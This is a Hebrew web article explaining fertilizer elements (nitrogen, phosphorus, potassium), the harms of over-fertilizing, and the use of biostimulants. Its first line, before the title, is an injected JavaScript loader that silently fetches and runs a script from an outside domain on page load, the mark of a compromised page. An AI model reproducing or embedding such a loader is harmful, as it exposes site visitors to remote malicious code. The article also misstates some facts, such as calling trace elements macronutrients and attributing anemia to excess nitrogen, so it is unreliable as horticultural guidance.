;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ביו-סטימולנטים: מה אתם באמת יודעים על שילוב דשנים עם מאיצי גדילה?
דשן

מה אתם באמת יודעים על שילוב דשנים עם ביו-סטימולנטים?

זה לא נושא שמרבים לדבר עליו בשיחות סלון או ליד הברזייה, זה גם לא נושא שעולה תדיר לסדר היום האקטואלי או נושא שגורם לשיחה תוססת, אבל אם אתם עוסקים בחקלאות או אפילו בגינון אתם חייבים להכיר אותו היטב – הדשן.

דשנים צריכים לעניין כל גנן וחקלאי כי בלעדיהם הצמחים לא יוכלו לגדול ולפרוח. הם חיוניים מאוד עבור צמחים מכל סוג וחשוב לדעת ממה הם מורכבים, על הסיכונים שיש בדשנים וכיצד יש ליישם אותם בחממה, בשדה או בגינה הפרטית שלנו.

השימוש ההולך וגובר בדשנים

אנחנו חיים בתרבות שפע. אנחנו קונים בלי הכרה ולעיתים גם ללא מחשבה מקדימה וכדי לספק את הצורך ההולך וגובר של הצרכנים החקלאים צריכים לעמוד בביקושים. במקביל, יש עליה בשיעור האוכלוסייה החיה על פני כדור הארץ וצריך לספק לעוד ועוד פיות מזון ואוכל.

כדי לעמוד בביקושים ההולכים וגדלים מחד ולהגדיל את התשואה על תוצרת חקלאית, מאידך, חקלאים חיפשו דרכים להגדיל את היבולים שלהם ובמהירות. עד מהרה הם גילו שכדי להגדיל את התוצרת יש לשפר את תזונת הצמחים. כי אם שולטים בתזונת הצמחים ניתן לשפר גם את היעילות, גם את התשואה, גם את היקף היבול וגם את האיכות.

דשן אורגני

לא על הקרקע לבדה

למרבה הצער הקרקעות הקיימות לא מכילות בתוכן די חומרים מזינים. כדי להפוך את הקרקע למניבה ורווחית יותר על החקלאי לטייב אותה. וכדי לעשות זאת יש צורך בהוספת דשנים המכילים חומרים מזינים.

אך כאשר מדברים על דשנים לא הכול ורוד. מחקרים שראו אור לאחרונה הוכיחו כי שימוש מופרז בדשנים פוגע בבריאות הציבור, בפוריות הקרקעות, במקורות מים ובמיקרואורגניזמים החיים בקרקע ובאוויר. דישון יתר יכול לגרום למליחות יתר של הקרקע, להצטברות של מתכות כבדות, לנזק למי התהום ולזיהום האוויר בגזים עתירי חנקן וגופרית שגורמים לאפקט החממה המדובר כל-כך. לכן חשוב להכיר היטב דשנים וליישם אותם בצורה נכונה וחכמה.

השילוש הקדוש: שלושת היסודות של הדשן

בדשנים נמצא 3 יסודות וכל אחד מהם הוא חיוני. אתם תמצאו את שלושת היסודות הללו על גבי האריזות של כל דשן, לכן מיד נסביר מה הם ומה המשמעות שלהם.

חנקן – N – Nitrogen

חנקן הוא הוא מבין היסודות החשובים ביותר בדשן ובכלל הוא יסוד חיוני לצמחים ולכל צורות החיים. החנקן הוא יסוד כימי שאמון על בריאות הצמח וביתר שאת על בריאות העלים הירוקים. אם צמח יקבל יותר מדי חנקן הוא יסבול מאנמיה, העדר פירות והעלים שלו לא יהיו מלאים וירוקים.

חנקן - מולקולה

זרחן – P – Phosphorus

היסוד השני שתמצאו בכל מארז דשנים הוא זרחן. לזרחן תפקיד חשוב בפריחה של צמחים. הוא אחראי שהפרח יהפוך לירק או לפרי. הזרחן מגדיל את היבול והופך את התוצרת לאחידה יותר. ללא זרחן בקרקע הצמח לא יכול להגיע לפריחה. רוב הקרקעות חסרות את יסוד הזרחן וחייבים להשלים אותו בעזרת דשנים או ביו-סטימולנטים.

אשלגן – K – Potassium

היסוד השלישי בכל שקית דשן הוא אשלגן. ללא אשלגן הצמחים יראו לנו חולים או חלושים, נטולי חיים וללא פירות. האשלגן מסייע בתהליך הפוטוסינתזה ושולט בתחלופת הפחמן הדו חמצני. ללא אשלגן מערכות הצמחים פשוט לא יוכלו לתפקד יחדיו.

אשלגן - דשנים

בנוסף, יש בדשנים גם מקרונוטריינטים

כפי שעולה מהכותרת בנוסף לשלושת היסודות שמנינו נמצא בדשנים גם מקרונוטריינטים. אלו חיוניים מאוד לתזונת הצמחים ובלעדיהם התפתחות הצמחים תהיה מוגבלת. חומרים אלו נקראים משניים לא כי הם אינם חשובים כי אם מאחר והם דרושים לצמחים בכמויות קטנות יותר משלושת היסודות. מקרונוטריינטים כוללים בין היתר: מנגן, ברזל, מוליבדן, בורון, ניקל, כלור, נחושת ואבץ.

שימוש נכון בדשנים ושילוב ביו-סטימולנטים

ציינו כבר כי חקלאים וגננים חייבים להימנע מדישון יתר, שכן דשנים המיושמים בכמויות גדולות מסכנים את הסביבה, את בעלי החיים וגם אותנו בני האדם החיים בסביבה הזו.

כדי להפחית את השימוש בדשנים כדאי מאוד לשלב ביו-סטימולנטים (מאיצי גדילה) אקולוגיים וטבעיים שאינם פוגעים בפוריות הקרקע, באיכות החיים שלנו ובמגוון הביולוגי. מזרזי גדילה אלו יסייעו לצמחים לספוג את המינרלים החיוניים באופן אופטימאלי, ישפרו את מערכת השורשים וגם את הפירות והעלווה.